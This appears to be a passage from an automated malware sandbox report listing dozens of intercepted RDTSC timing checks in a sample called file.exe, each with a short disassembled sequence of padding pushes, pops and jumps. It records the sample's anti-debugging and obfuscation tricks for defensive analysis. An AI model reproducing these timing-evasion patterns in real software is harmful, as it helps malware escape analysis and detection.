                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F4DD2 second address: 10F4DD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118089F second address: 11808A6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1143A20 second address: 1143A2A instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1143A2A second address: 1143A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC83CB64D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1143A34 second address: 1143A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1143A43 second address: 1143A49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11440E9 second address: 114414A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], esi 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FC83CB776A8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 or dword ptr [ebp+122D28CAh], ecx 0x00000029 nop 0x0000002a pushad 0x0000002b jo 00007FC83CB776A8h 0x00000031 pushad 0x00000032 popad 0x00000033 push esi 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 pop esi 0x00000037 popad 0x00000038 push eax 0x00000039 pushad 0x0000003a jmp 00007FC83CB776B7h 0x0000003f pushad 0x00000040 je 00007FC83CB776A6h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1144407 second address: 114440B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114440B second address: 1144411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1144411 second address: 1144458 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push esi 0x0000000c mov edx, dword ptr [ebp+122D2D0Fh] 0x00000012 pop edx 0x00000013 push 00000004h 0x00000015 sub edi, dword ptr [ebp+122D2B1Bh] 0x0000001b jg 00007FC83CB64D3Bh 0x00000021 add di, 85DBh 0x00000026 nop 0x00000027 jmp 00007FC83CB64D3Ah 0x0000002c push eax 0x0000002d pushad 0x0000002e jp 00007FC83CB64D3Ch 0x00000034 push eax 0x00000035 push edx 0x00000036 jg 00007FC83CB64D36h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114444C second address: 1144458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007FC83CB776A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1180E2A second address: 1180E32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11811E2 second address: 1181200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB776B8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1181200 second address: 1181211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC83CB64D36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1181211 second address: 1181215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1181215 second address: 118121F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118121F second address: 1181226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1181226 second address: 118122C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11885F5 second address: 11885F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11885F9 second address: 1188627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D3Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC83CB64D47h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1188627 second address: 118862D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B53B second address: 118B545 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC83CB64D42h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B545 second address: 118B54B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B54B second address: 118B57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC83CB64D48h 0x0000000d jo 00007FC83CB64D42h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FC83CB64D3Ah 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118AF29 second address: 118AF40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B2h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B07B second address: 118B0A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC83CB64D47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B0A1 second address: 118B0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118B0A6 second address: 118B0E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D44h 0x00000007 jmp 00007FC83CB64D45h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007FC83CB64D3Fh 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D46E second address: 118D495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FC83CB776E5h 0x0000000b jmp 00007FC83CB776B2h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007FC83CB776A6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D495 second address: 118D499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D5CA second address: 118D5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D5CE second address: 118D5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D3Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D5E5 second address: 118D5EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D5EB second address: 118D5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D5EF second address: 118D5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D5F3 second address: 118D607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC83CB64D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FC83CB64D38h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D607 second address: 118D60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D60F second address: 118D613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118D613 second address: 118D619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118EF1E second address: 118EF29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC83CB64D36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 118EF29 second address: 118EF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1190824 second address: 119082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC83CB64D36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 119082E second address: 1190832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11953F1 second address: 11953F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11953F7 second address: 11953FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11953FB second address: 11953FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119470B second address: 1194748 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC83CB776A6h 0x00000009 jmp 00007FC83CB776B7h 0x0000000e jmp 00007FC83CB776AEh 0x00000013 jg 00007FC83CB776A6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007FC83CB776A6h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194748 second address: 1194767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC83CB64D3Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnp 00007FC83CB64D44h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194A1C second address: 1194A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194A22 second address: 1194A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D49h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194A41 second address: 1194A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC83CB776B6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1194BE6 second address: 1194C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC83CB64D36h 0x0000000a jmp 00007FC83CB64D43h 0x0000000f jc 00007FC83CB64D36h 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197A97 second address: 1197AC1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC83CB776B8h 0x00000011 jne 00007FC83CB776A6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197C39 second address: 1197C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C48A second address: 119C4AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC83CB776A6h 0x00000008 jno 00007FC83CB776A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnc 00007FC83CB776A8h 0x00000016 jnp 00007FC83CB776ACh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C65B second address: 119C65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C65F second address: 119C671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FC83CB776AEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C671 second address: 119C696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC83CB64D51h 0x0000000a jmp 00007FC83CB64D49h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C696 second address: 119C69D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C7F5 second address: 119C814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FC83CB64D4Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C984 second address: 119C99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FC83CB776B5h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C99E second address: 119C9CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FC83CB64D4Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C9CE second address: 119C9D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C9D4 second address: 119C9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119C9D8 second address: 119C9DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114461E second address: 114468B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 ja 00007FC83CB64D3Ah 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FC83CB64D38h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+124856CDh] 0x00000030 mov dword ptr [ebp+122D2943h], esi 0x00000036 add eax, ebx 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007FC83CB64D38h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Ah 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 mov cx, 95B5h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c pop ecx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114468B second address: 114468F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114468F second address: 1144695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144695 second address: 11446DE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB776ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub di, 4D00h 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FC83CB776A8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e clc 0x0000002f nop 0x00000030 jc 00007FC83CB776B4h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11446DE second address: 11446E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11446E2 second address: 11446FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FC83CB776B2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11447A5 second address: 11447DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FC83CB64D38h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov di, D97Ah 0x00000025 push 0000001Eh 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e pop eax 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119D910 second address: 119D916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A5A0A second address: 11A5A10 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F68B5 second address: 10F68C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F68C0 second address: 10F691C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D49h 0x00000007 jmp 00007FC83CB64D45h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push edi 0x00000010 jmp 00007FC83CB64D3Ch 0x00000015 pushad 0x00000016 jmp 00007FC83CB64D47h 0x0000001b push edx 0x0000001c pop edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3B81 second address: 11A3B90 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83CB776A6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4926 second address: 11A492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4BEF second address: 11A4BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4F45 second address: 11A4F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A4F49 second address: 11A4F53 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC83CB776A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AACB5 second address: 11AACC7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FC83CB64D36h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB42 second address: 11ADB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB46 second address: 11ADB4C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADB4C second address: 11ADB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADDCC second address: 11ADE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FC83CB64D43h 0x0000000a push eax 0x0000000b jmp 00007FC83CB64D46h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FC83CB64D36h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADE06 second address: 11ADE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE0B3 second address: 11AE0C2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC83CB64D36h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE0C2 second address: 11AE0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FC83CB776A6h 0x0000000a jg 00007FC83CB776A6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE3E4 second address: 11AE403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC83CB64D47h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE403 second address: 11AE409 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4537 second address: 11B4541 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC83CB64D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B469E second address: 11B46A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
